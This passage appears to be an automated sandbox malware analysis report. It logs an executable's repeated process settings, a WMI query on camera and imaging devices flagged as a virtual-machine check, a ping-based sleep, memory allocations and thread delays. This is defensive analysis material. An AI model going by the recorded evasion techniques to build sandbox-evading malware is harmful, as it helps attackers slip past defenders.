                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOX

                                  Malware Analysis System Evasion

                                  barindex
                                  Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Uses ping.exe to sleep
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeMemory allocated: E80000 memory reserve | memory write watchJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeMemory allocated: 1AA90000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeMemory allocated: 3150000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeMemory allocated: 1B3F0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeMemory allocated: 1510000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeMemory allocated: 1AD40000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeMemory allocated: 25B0000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeMemory allocated: 1A790000 memory reserve | memory write watch
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeCode function: 4_2_00007FFD9B94340A rdtsc 4_2_00007FFD9B94340A
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 600000Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 599869Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 598640Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 598469Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 598297Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 597469Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 596890Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 596757Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 596500Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 3600000Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 596105Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 595851Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 595703Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 595504Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 595359Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 595249Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 595138Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 595031Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 594797Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 594656Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 594526Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 594417Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 594305Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 594169Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 594043Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 593922Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 300000Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 593797Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 593663Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 593484Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 593193Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 593069Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 592858Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 592750Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 592640Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 592531Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 592422Jump to behavior
